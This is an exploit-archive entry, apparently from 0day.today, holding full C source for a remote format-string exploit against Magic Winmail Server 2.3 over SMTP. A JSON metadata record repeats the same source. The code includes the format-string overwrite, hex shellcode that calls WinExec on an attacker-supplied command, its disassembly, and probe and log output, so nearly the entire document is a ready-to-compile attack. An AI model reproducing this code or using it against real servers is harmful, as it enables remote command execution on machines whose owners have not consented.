Winmail Mail Server 2.3 Remote Format String Exploit
2003-06-11T00:00:00
ID 1337DAY-ID-8314 Type zdt Reporter ThreaT Modified 2003-06-11T00:00:00
Description
Exploit for unknown platform in category remote exploits
====================================================
Winmail Mail Server 2.3 Remote Format String Exploit
====================================================
/******************************************************************
* Magic Winmail Server 2.3(Build 0402)
* Remote Format string exploit.
******************************************************************
* Coded by ThreaT.
*
*
* This one take advantage of a format bug in the
* >>> SMTP protocol <<< (not pop3) for execute
* a malicious command on a vulnerable system
*
* usage : mwmxploit <Target IP> <command to execute remotely> [smtp port]
* + The command to execute cannot exceed 90 characters +
*
* compile : cl.exe mwmxploit.c /w
*
******************************************************************
*/
#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")
void main (int argc, char *argv[])
{
SOCKET sock;
char buffer[1000];
int i;
// ecrasement d'un saved EIP gr?ce aux caract?res de format
char vuln[] =
"\xec\xfc\x66\x01%x%x"
"\xed\xfc\x66\x01%x%x"
"\xee\xfc\x66\x01"
"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%28x%n"
"%97x%n%105x%hn"
/*
This is my specific shellcode for execute a command
over the Magic Winmail process.
This one can contain null bytes, enjoy ! :)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Disassembly of File: mailserver.exe
Code Offset = 00001000, Code Size = 000CF000
Data Offset = 000EC000, Data Size = 0002E000
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Reference To: KERNEL32.GetModuleHandleA, Ord:0000h
:004B8850 FF15AC014D00 Call dword ptr [004D01AC]
Reference To: KERNEL32.ExitProcess, Ord:0000h
:004B88C6 FF1598014D00 Call dword ptr [004D0198]
Reference To: KERNEL32.GetProcAddress, Ord:0000h
:00406CE7 8B3DEC004D00 mov edi, dword ptr [004D00EC]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
//////////////////////// My shellcode \\\\\\\\\\\\\\\\\\\\\\\\\\
: EB50 jmp 00401058
: 5E pop esi
: 8BEC mov ebp, esp
: 83EC28 sub esp, 00000028 // je cree un stack
: C745D84B65726E mov [ebp-28], 6E72654B
: C745DC656C3332 mov [ebp-24], 32336C65 // j'y place 'Kernel32'
: C745E000000000 mov [ebp-20], 00000000
: C745E457696E45 mov [ebp-1C], 456E6957
: C745E878656300 mov [ebp-18], 00636578 // ici 'WinExec'
// adaptez le shellcode en virant cette ligne si vraiment vous avez besoin
// de 4 caract?res de plus pour la commande ? executer
: C645EB00 mov [ebp-15], 00
: BAAC014D00 mov edx, 004D01AC
: 8D45D8 lea eax, dword ptr [ebp-28]
: 50 push eax
: FF12 call dword ptr [edx] // eax = GetModuleHandle ("Kernel32");
: 8D5DE4 lea ebx, dword ptr [ebp-1C]
: 53 push ebx
: 50 push eax
: BAEC004D00 mov edx, 004D00EC
: FF12 call dword ptr [edx] // GetProcAdress (eax, "WinExec");
: 6A01 push 00000001 // 1 = SW_SHOW, 0 = SW_HIDE
: 56 push esi
: FFD0 call eax // WinExec (argv[2], SW_SHOW)
: BA98014D00 mov edx, 004D0198
: FF12 call dword ptr [edx] // ExitProcess ();
: E8ABFFFFFF call 00401008
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ EOF /////////////////////////////////
*/
// Generated by Hex Workshop
// shellcode.exe - Starting Offset: 4102 (0x00001006) Length: 87 (0x00000057)
"\x00\x90\x90\x90\x90" // sa, c'est pour bien coller
"\xEB\x50\x5E\x8B\xEC\x83\xEC\x28\xC7\x45\xD8\x4B\x65\x72\x6E\xC7"
"\x45\xDC\x65\x6C\x33\x32\xC7\x45\xE0\x00\x00\x00\x00\xC7\x45\xE4"
"\x57\x69\x6E\x45\xC7\x45\xE8\x78\x65\x63\x00\xC6\x45\xEB\x00\xBA"
"\xAC\x01\x4D\x00\x8D\x45\xD8\x50\xFF\x12\x8D\x5D\xE4\x53\x50\xBA"
"\xEC\x00\x4D\x00\xFF\x12\x6A\x01\x56\xFF\xD0\xBA\x98\x01\x4D\x00"
"\xFF\x12\xE8\xAB\xFF\xFF\xFF";
SOCKADDR_IN sin;
WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);
//
printf ("* #################################### *\n"
" Magic Winmail Server 2.3(Build 0402)\n"
" Remote format string exploit !\n"
"* #################################### *\n"
" Coded By ThreaT -> ThreaT\n\n");
if (argc < 3 || strlen (argv[2]) > 90)
{
printf ("usage : mwmxploit <Target IP> <command to execute> [smtp port]\n\n"
" + The command to execute cannot exceed 90 characters +\n");
ExitProcess (0);
}
if ( WSAStartup(wVersionRequested, &wsadata) )
{
printf ("Erreur d'initialisation winsock !\n");
ExitProcess (1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons ((void *)argv[3] ? atoi (argv[3]) : 25);
if ( (sin.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Erreur : L'adresse IP de la victime est incorrect !\n");
ExitProcess (2);
}
printf ("connecting to %s on port %u...", argv[1], ntohs ( sin.sin_port ) );
sock = socket (AF_INET, SOCK_STREAM, 0);
if ( connect (sock, (SOCKADDR *)&sin, sizeof (sin)) )
{
printf ("erreur : connexion impossible !\n");
ExitProcess (3);
}
recv (sock,buffer,1000,0);
printf ("ok\n-> %s\nsending exploit code...",buffer);
send (sock, vuln, strlen (vuln) + 92, 0); // envoi du shellcode
send (sock, argv[2], strlen (argv[2]), 0); // envoi de la commande
send (sock, "\r\n", 2, 0); // validation
recv (sock,buffer,1000,0); // remote crash :)
puts ("ok");
}
/*
D:\toolz\netcat>nc 127.0.0.1 25
220 M1 Magic Winmail Server 2.3(Build 0402) ESMTP ready
AAAA 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.
8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
502 unimplemented (#5.5.1)
*/
/*
D:\>type "c:\Program Files\Magic Winmail\server\logs\smtp.log"
0906/Y-01:50:30 1548 Connect from 127.0.0.1
0906/Y-01:51:06 1584 unrecognized command = AAAA 0x00498f71 0x0176fd10
0x0176fe3c 0x000000eb 0x0176ff80 0x00ee6c80 0x00000050 0x00ee60d9 0x00000102
0x0000011f 0x00000050 0x00eecf71 0x0000001c 0x0000001f 0x0176ff74 0x004cd2c0
0x00000001 0x00493e40 0x0176fd50 0x00000000 0x00ee5ea8 0x00ee5ea8 0x41414141
0x25783020 0x2078382e 0x2e257830 0x30207838 0x382e2578 0x78302078 0x78382e25
0x25783020 0x2078382e 0x2e257830
*/
# 0day.today [2018-03-19] #
{"hash": "76cb9d0660805ed408f4571b4630b73c9a665717edabda876db6dcc495a6a7f3", "id": "1337DAY-ID-8314", "lastseen": "2018-03-19T03:07:54", "viewCount": 2, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "b7647a0b7e2a3ddaf3a114d109898bc1", "key": "href"}, {"hash": "c7b49bfaaf93f1b2eb7c4eadc9b7e528", "key": "modified"}, {"hash": "c7b49bfaaf93f1b2eb7c4eadc9b7e528", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9b4f5c27a62a56b6820acf39f9c92754", "key": "reporter"}, {"hash": "b7abf0fdd8e5c0b01cf660cf994f0e52", "key": "sourceData"}, {"hash": "392da13b148a43e4bb5e8f2969efd981", "key": "sourceHref"}, {"hash": "7818ba7010b3be65059fe8a0073b5077", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 1.9, "vector": "NONE", "modified": "2018-03-19T03:07:54"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310813649", "OPENVAS:1361412562310813645", "OPENVAS:1361412562310862646"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_JUL_4338829.NASL", "SMB_NT_MS18_JUL_4338815.NASL", "SMB_NT_MS18_JUL_4338818.NASL"]}, {"type": "redhat", "idList": ["RHSA-2013:0566"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/ORACLE/ORACLE_HASHDUMP"]}, {"type": "zdt", "idList": ["1337DAY-ID-6759", "1337DAY-ID-4102", "1337DAY-ID-1584"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:4074"]}], "modified": "2018-03-19T03:07:54"}, "vulnersScore": 1.9}, "type": "zdt", "sourceHref": "https://0day.today/exploit/8314", "description": "Exploit for unknown platform in category remote exploits", "title": "Winmail Mail Server 2.3 Remote Format String Exploit", "history": [{"bulletin": {"hash": "58a0284dbe088bbdb539fe7cfff8323a7fad69f1f512912361c741943951954b", "id": "1337DAY-ID-8314", "lastseen": "2016-04-20T01:30:17", "enchantments": {"score": {"value": 6.6, "modified": "2016-04-20T01:30:17"}}, "hashmap": [{"hash": "7818ba7010b3be65059fe8a0073b5077", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "9b4f5c27a62a56b6820acf39f9c92754", "key": "reporter"}, {"hash": "788babe8baff0df7a9a482925f972d62", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c1188a9a1f092bd6d0619eba695db2d7", "key": "href"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "c7b49bfaaf93f1b2eb7c4eadc9b7e528", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "5aec85fd474854571b2f005ff7ce7917", "key": "sourceHref"}, {"hash": "c7b49bfaaf93f1b2eb7c4eadc9b7e528", "key": "modified"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/8314", "description": "Exploit for unknown platform in category remote exploits", "viewCount": 1, "title": "Winmail Mail Server 2.3 Remote Format String Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "====================================================\r\nWinmail Mail Server 2.3 Remote Format String Exploit\r\n====================================================\r\n\r\n\r\n/******************************************************************\r\n * Magic Winmail Server 2.3(Build 0402) \r\n * Remote Format string exploit.\r\n ******************************************************************\r\n * Coded by ThreaT.\r\n *\r\n *\r\n * This one take advantage of a format bug in the \r\n * >>> SMTP protocol <<< (not pop3) for execute\r\n * a malicious command on a vulnerable system\r\n *\r\n * usage : mwmxploit <Target IP> <command to execute remotely> [smtp port]\r\n * + The command to execute cannot exceed 90 characters +\r\n *\r\n * compile : cl.exe mwmxploit.c /w\r\n *\r\n ******************************************************************\r\n*/\r\n\r\n\r\n#include <windows.h>\r\n#include <winsock.h>\r\n\r\n#pragma comment (lib,\"wsock32.lib\")\r\n\r\nvoid main (int argc, char *argv[])\r\n{\r\n\r\n\tSOCKET sock;\r\n\r\n\tchar buffer[1000];\r\n\tint i;\r\n\r\n\t// ecrasement d'un saved EIP gr?ce aux caract?res de format\r\n\tchar vuln[] = \t\t\r\n\t\t\"\\xec\\xfc\\x66\\x01%x%x\"\r\n\t\t\"\\xed\\xfc\\x66\\x01%x%x\"\r\n\t\t\"\\xee\\xfc\\x66\\x01\"\r\n\t\t\r\n\t\t\"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%28x%n\"\r\n\t\t\"%97x%n%105x%hn\"\r\n\r\n/*\r\n\r\n This is my specific shellcode for execute a command\r\n over the Magic Winmail process.\r\n\r\n This one can contain null bytes, enjoy ! :)\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\nDisassembly of File: mailserver.exe\r\nCode Offset = 00001000, Code Size = 000CF000\r\nData Offset = 000EC000, Data Size = 0002E000\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n Reference To: KERNEL32.GetModuleHandleA, Ord:0000h\r\n:004B8850 FF15AC014D00 Call dword ptr [004D01AC]\r\n\r\n Reference To: KERNEL32.ExitProcess, Ord:0000h\r\n:004B88C6 FF1598014D00 Call dword ptr [004D0198]\r\n\r\n Reference To: KERNEL32.GetProcAddress, Ord:0000h\r\n:00406CE7 8B3DEC004D00 mov edi, dword ptr [004D00EC]\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\n //////////////////////// My shellcode \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\r\n\r\n: EB50 jmp 00401058\r\n: 5E pop esi\r\n: 8BEC mov ebp, esp\r\n: 83EC28 sub esp, 00000028\t\t// je cree un stack\r\n: C745D84B65726E mov [ebp-28], 6E72654B\r\n: C745DC656C3332 mov [ebp-24], 32336C65 // j'y place 'Kernel32'\r\n: C745E000000000 mov [ebp-20], 00000000\r\n: C745E457696E45 mov [ebp-1C], 456E6957\r\n: C745E878656300 mov [ebp-18], 00636578 // ici 'WinExec'\r\n\r\n// adaptez le shellcode en virant cette ligne si vraiment vous avez besoin \r\n// de 4 caract?res de plus pour la commande ? executer\r\n: C645EB00 mov [ebp-15], 00\r\n\t\t\t\t\t\t\t\t\t\t\r\n: BAAC014D00 mov edx, 004D01AC\r\n: 8D45D8 lea eax, dword ptr [ebp-28]\r\n: 50 push eax\r\n: FF12 call dword ptr [edx]\t// eax = GetModuleHandle (\"Kernel32\");\r\n: 8D5DE4 lea ebx, dword ptr [ebp-1C]\r\n: 53 push ebx\r\n: 50 push eax\r\n: BAEC004D00 mov edx, 004D00EC\r\n: FF12 call dword ptr [edx]\t// GetProcAdress (eax, \"WinExec\");\r\n: 6A01 push 00000001\t\t// 1 = SW_SHOW, 0 = SW_HIDE \r\n: 56 push esi\r\n: FFD0 call eax\t\t\t// WinExec (argv[2], SW_SHOW)\r\n: BA98014D00 mov edx, 004D0198\r\n: FF12 call dword ptr [edx]\t// ExitProcess ();\r\n: E8ABFFFFFF call 00401008\t\r\n\r\n \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ EOF /////////////////////////////////\r\n\r\n */\r\n\t\r\n\r\n// Generated by Hex Workshop\r\n// shellcode.exe - Starting Offset: 4102 (0x00001006) Length: 87 (0x00000057)\r\n\r\n\t\"\\x00\\x90\\x90\\x90\\x90\"\t// sa, c'est pour bien coller\r\n\t\"\\xEB\\x50\\x5E\\x8B\\xEC\\x83\\xEC\\x28\\xC7\\x45\\xD8\\x4B\\x65\\x72\\x6E\\xC7\" \r\n\t\"\\x45\\xDC\\x65\\x6C\\x33\\x32\\xC7\\x45\\xE0\\x00\\x00\\x00\\x00\\xC7\\x45\\xE4\" \r\n\t\"\\x57\\x69\\x6E\\x45\\xC7\\x45\\xE8\\x78\\x65\\x63\\x00\\xC6\\x45\\xEB\\x00\\xBA\" \r\n\t\"\\xAC\\x01\\x4D\\x00\\x8D\\x45\\xD8\\x50\\xFF\\x12\\x8D\\x5D\\xE4\\x53\\x50\\xBA\" \r\n\t\"\\xEC\\x00\\x4D\\x00\\xFF\\x12\\x6A\\x01\\x56\\xFF\\xD0\\xBA\\x98\\x01\\x4D\\x00\" \r\n\t\"\\xFF\\x12\\xE8\\xAB\\xFF\\xFF\\xFF\";\r\n\r\n\tSOCKADDR_IN sin;\r\n\tWSADATA wsadata;\r\n\tWORD wVersionRequested = MAKEWORD (2,0);\r\n\r\n\t//\r\n\tprintf (\"* #################################### *\\n\"\r\n\t\t\" Magic Winmail Server 2.3(Build 0402)\\n\"\r\n\t\t\" Remote format string exploit !\\n\"\r\n\t\t\"* #################################### *\\n\"\r\n\t\t\" Coded By ThreaT -> ThreaT\\n\\n\");\r\n\r\n\tif (argc < 3 || strlen (argv[2]) > 90)\r\n\t{\r\n\tprintf (\"usage : mwmxploit <Target IP> <command to execute> [smtp port]\\n\\n\"\r\n\t\t\t\" + The command to execute cannot exceed 90 characters +\\n\");\r\n\tExitProcess (0);\r\n\t}\r\n\r\n\tif ( WSAStartup(wVersionRequested, &wsadata) )\r\n\t{\r\n\t\tprintf (\"Erreur d'initialisation winsock !\\n\");\r\n\t\tExitProcess (1);\t\t\r\n\t}\r\n\r\n\tsin.sin_family = AF_INET;\r\n\tsin.sin_port = htons ((void *)argv[3] ? atoi (argv[3]) : 25);\r\n\t\r\n\tif ( (sin.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)\r\n\t{\r\n\t\tprintf (\"Erreur : L'adresse IP de la victime est incorrect !\\n\");\r\n\t\tExitProcess (2);\r\n\t}\r\n\r\n\tprintf (\"connecting to %s on port %u...\", argv[1], ntohs ( sin.sin_port ) );\r\n\r\n\tsock = socket (AF_INET, SOCK_STREAM, 0);\r\n\tif ( connect (sock, (SOCKADDR *)&sin, sizeof (sin)) )\r\n\t{\r\n\t\tprintf (\"erreur : connexion impossible !\\n\");\r\n\t\tExitProcess (3);\r\n\t}\r\n\r\n\trecv (sock,buffer,1000,0);\r\n\t\r\n\tprintf (\"ok\\n-> %s\\nsending exploit code...\",buffer);\r\n\r\n\tsend (sock, vuln, strlen (vuln) + 92, 0); // envoi du shellcode\r\n\tsend (sock, argv[2], strlen (argv[2]), 0); // envoi de la commande\r\n\tsend (sock, \"\\r\\n\", 2, 0); // validation\r\n\r\n\trecv (sock,buffer,1000,0); // remote crash :)\r\n\r\n\tputs (\"ok\");\r\n}\r\n\r\n/*\r\nD:\\toolz\\netcat>nc 127.0.0.1 25\r\n220 M1 Magic Winmail Server 2.3(Build 0402) ESMTP ready\r\nAAAA 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x \r\n0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.\r\n8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x \r\n0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x\r\n502 unimplemented (#5.5.1)\r\n */\r\n\r\n/*\r\nD:\\>type \"c:\\Program Files\\Magic Winmail\\server\\logs\\smtp.log\"\r\n0906/Y-01:50:30 1548 Connect from 127.0.0.1\r\n0906/Y-01:51:06 1584 unrecognized command = AAAA 0x00498f71 0x0176fd10 \r\n0x0176fe3c 0x000000eb 0x0176ff80 0x00ee6c80 0x00000050 0x00ee60d9 0x00000102 \r\n0x0000011f 0x00000050 0x00eecf71 0x0000001c 0x0000001f 0x0176ff74 0x004cd2c0 \r\n0x00000001 0x00493e40 0x0176fd50 0x00000000 0x00ee5ea8 0x00ee5ea8 0x41414141 \r\n0x25783020 0x2078382e 0x2e257830 0x30207838 0x382e2578 0x78302078 0x78382e25 \r\n0x25783020 0x2078382e 0x2e257830\r\n\r\n*/\r\n\r\n\r \n\n# 0day.today [2016-04-20] #", "published": "2003-06-11T00:00:00", "references": [], "reporter": "ThreaT", "modified": "2003-06-11T00:00:00", "href": "http://0day.today/exploit/description/8314"}, "lastseen": "2016-04-20T01:30:17", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "====================================================\r\nWinmail Mail Server 2.3 Remote Format String Exploit\r\n====================================================\r\n\r\n\r\n/******************************************************************\r\n * Magic Winmail Server 2.3(Build 0402) \r\n * Remote Format string exploit.\r\n ******************************************************************\r\n * Coded by ThreaT.\r\n *\r\n *\r\n * This one take advantage of a format bug in the \r\n * >>> SMTP protocol <<< (not pop3) for execute\r\n * a malicious command on a vulnerable system\r\n *\r\n * usage : mwmxploit <Target IP> <command to execute remotely> [smtp port]\r\n * + The command to execute cannot exceed 90 characters +\r\n *\r\n * compile : cl.exe mwmxploit.c /w\r\n *\r\n ******************************************************************\r\n*/\r\n\r\n\r\n#include <windows.h>\r\n#include <winsock.h>\r\n\r\n#pragma comment (lib,\"wsock32.lib\")\r\n\r\nvoid main (int argc, char *argv[])\r\n{\r\n\r\n\tSOCKET sock;\r\n\r\n\tchar buffer[1000];\r\n\tint i;\r\n\r\n\t// ecrasement d'un saved EIP gr?ce aux caract?res de format\r\n\tchar vuln[] = \t\t\r\n\t\t\"\\xec\\xfc\\x66\\x01%x%x\"\r\n\t\t\"\\xed\\xfc\\x66\\x01%x%x\"\r\n\t\t\"\\xee\\xfc\\x66\\x01\"\r\n\t\t\r\n\t\t\"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%28x%n\"\r\n\t\t\"%97x%n%105x%hn\"\r\n\r\n/*\r\n\r\n This is my specific shellcode for execute a command\r\n over the Magic Winmail process.\r\n\r\n This one can contain null bytes, enjoy ! :)\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\nDisassembly of File: mailserver.exe\r\nCode Offset = 00001000, Code Size = 000CF000\r\nData Offset = 000EC000, Data Size = 0002E000\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n Reference To: KERNEL32.GetModuleHandleA, Ord:0000h\r\n:004B8850 FF15AC014D00 Call dword ptr [004D01AC]\r\n\r\n Reference To: KERNEL32.ExitProcess, Ord:0000h\r\n:004B88C6 FF1598014D00 Call dword ptr [004D0198]\r\n\r\n Reference To: KERNEL32.GetProcAddress, Ord:0000h\r\n:00406CE7 8B3DEC004D00 mov edi, dword ptr [004D00EC]\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\n //////////////////////// My shellcode \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\r\n\r\n: EB50 jmp 00401058\r\n: 5E pop esi\r\n: 8BEC mov ebp, esp\r\n: 83EC28 sub esp, 00000028\t\t// je cree un stack\r\n: C745D84B65726E mov [ebp-28], 6E72654B\r\n: C745DC656C3332 mov [ebp-24], 32336C65 // j'y place 'Kernel32'\r\n: C745E000000000 mov [ebp-20], 00000000\r\n: C745E457696E45 mov [ebp-1C], 456E6957\r\n: C745E878656300 mov [ebp-18], 00636578 // ici 'WinExec'\r\n\r\n// adaptez le shellcode en virant cette ligne si vraiment vous avez besoin \r\n// de 4 caract?res de plus pour la commande ? executer\r\n: C645EB00 mov [ebp-15], 00\r\n\t\t\t\t\t\t\t\t\t\t\r\n: BAAC014D00 mov edx, 004D01AC\r\n: 8D45D8 lea eax, dword ptr [ebp-28]\r\n: 50 push eax\r\n: FF12 call dword ptr [edx]\t// eax = GetModuleHandle (\"Kernel32\");\r\n: 8D5DE4 lea ebx, dword ptr [ebp-1C]\r\n: 53 push ebx\r\n: 50 push eax\r\n: BAEC004D00 mov edx, 004D00EC\r\n: FF12 call dword ptr [edx]\t// GetProcAdress (eax, \"WinExec\");\r\n: 6A01 push 00000001\t\t// 1 = SW_SHOW, 0 = SW_HIDE \r\n: 56 push esi\r\n: FFD0 call eax\t\t\t// WinExec (argv[2], SW_SHOW)\r\n: BA98014D00 mov edx, 004D0198\r\n: FF12 call dword ptr [edx]\t// ExitProcess ();\r\n: E8ABFFFFFF call 00401008\t\r\n\r\n \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ EOF /////////////////////////////////\r\n\r\n */\r\n\t\r\n\r\n// Generated by Hex Workshop\r\n// shellcode.exe - Starting Offset: 4102 (0x00001006) Length: 87 (0x00000057)\r\n\r\n\t\"\\x00\\x90\\x90\\x90\\x90\"\t// sa, c'est pour bien coller\r\n\t\"\\xEB\\x50\\x5E\\x8B\\xEC\\x83\\xEC\\x28\\xC7\\x45\\xD8\\x4B\\x65\\x72\\x6E\\xC7\" \r\n\t\"\\x45\\xDC\\x65\\x6C\\x33\\x32\\xC7\\x45\\xE0\\x00\\x00\\x00\\x00\\xC7\\x45\\xE4\" \r\n\t\"\\x57\\x69\\x6E\\x45\\xC7\\x45\\xE8\\x78\\x65\\x63\\x00\\xC6\\x45\\xEB\\x00\\xBA\" \r\n\t\"\\xAC\\x01\\x4D\\x00\\x8D\\x45\\xD8\\x50\\xFF\\x12\\x8D\\x5D\\xE4\\x53\\x50\\xBA\" \r\n\t\"\\xEC\\x00\\x4D\\x00\\xFF\\x12\\x6A\\x01\\x56\\xFF\\xD0\\xBA\\x98\\x01\\x4D\\x00\" \r\n\t\"\\xFF\\x12\\xE8\\xAB\\xFF\\xFF\\xFF\";\r\n\r\n\tSOCKADDR_IN sin;\r\n\tWSADATA wsadata;\r\n\tWORD wVersionRequested = MAKEWORD (2,0);\r\n\r\n\t//\r\n\tprintf (\"* #################################### *\\n\"\r\n\t\t\" Magic Winmail Server 2.3(Build 0402)\\n\"\r\n\t\t\" Remote format string exploit !\\n\"\r\n\t\t\"* #################################### *\\n\"\r\n\t\t\" Coded By ThreaT -> ThreaT\\n\\n\");\r\n\r\n\tif (argc < 3 || strlen (argv[2]) > 90)\r\n\t{\r\n\tprintf (\"usage : mwmxploit <Target IP> <command to execute> [smtp port]\\n\\n\"\r\n\t\t\t\" + The command to execute cannot exceed 90 characters +\\n\");\r\n\tExitProcess (0);\r\n\t}\r\n\r\n\tif ( WSAStartup(wVersionRequested, &wsadata) )\r\n\t{\r\n\t\tprintf (\"Erreur d'initialisation winsock !\\n\");\r\n\t\tExitProcess (1);\t\t\r\n\t}\r\n\r\n\tsin.sin_family = AF_INET;\r\n\tsin.sin_port = htons ((void *)argv[3] ? atoi (argv[3]) : 25);\r\n\t\r\n\tif ( (sin.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)\r\n\t{\r\n\t\tprintf (\"Erreur : L'adresse IP de la victime est incorrect !\\n\");\r\n\t\tExitProcess (2);\r\n\t}\r\n\r\n\tprintf (\"connecting to %s on port %u...\", argv[1], ntohs ( sin.sin_port ) );\r\n\r\n\tsock = socket (AF_INET, SOCK_STREAM, 0);\r\n\tif ( connect (sock, (SOCKADDR *)&sin, sizeof (sin)) )\r\n\t{\r\n\t\tprintf (\"erreur : connexion impossible !\\n\");\r\n\t\tExitProcess (3);\r\n\t}\r\n\r\n\trecv (sock,buffer,1000,0);\r\n\t\r\n\tprintf (\"ok\\n-> %s\\nsending exploit code...\",buffer);\r\n\r\n\tsend (sock, vuln, strlen (vuln) + 92, 0); // envoi du shellcode\r\n\tsend (sock, argv[2], strlen (argv[2]), 0); // envoi de la commande\r\n\tsend (sock, \"\\r\\n\", 2, 0); // validation\r\n\r\n\trecv (sock,buffer,1000,0); // remote crash :)\r\n\r\n\tputs (\"ok\");\r\n}\r\n\r\n/*\r\nD:\\toolz\\netcat>nc 127.0.0.1 25\r\n220 M1 Magic Winmail Server 2.3(Build 0402) ESMTP ready\r\nAAAA 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x \r\n0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.\r\n8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x \r\n0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x\r\n502 unimplemented (#5.5.1)\r\n */\r\n\r\n/*\r\nD:\\>type \"c:\\Program Files\\Magic Winmail\\server\\logs\\smtp.log\"\r\n0906/Y-01:50:30 1548 Connect from 127.0.0.1\r\n0906/Y-01:51:06 1584 unrecognized command = AAAA 0x00498f71 0x0176fd10 \r\n0x0176fe3c 0x000000eb 0x0176ff80 0x00ee6c80 0x00000050 0x00ee60d9 0x00000102 \r\n0x0000011f 0x00000050 0x00eecf71 0x0000001c 0x0000001f 0x0176ff74 0x004cd2c0 \r\n0x00000001 0x00493e40 0x0176fd50 0x00000000 0x00ee5ea8 0x00ee5ea8 0x41414141 \r\n0x25783020 0x2078382e 0x2e257830 0x30207838 0x382e2578 0x78302078 0x78382e25 \r\n0x25783020 0x2078382e 0x2e257830\r\n\r\n*/\r\n\r\n\r \n\n# 0day.today [2018-03-19] #", "published": "2003-06-11T00:00:00", "references": [], "reporter": "ThreaT", "modified": "2003-06-11T00:00:00", "href": "https://0day.today/exploit/description/8314"}
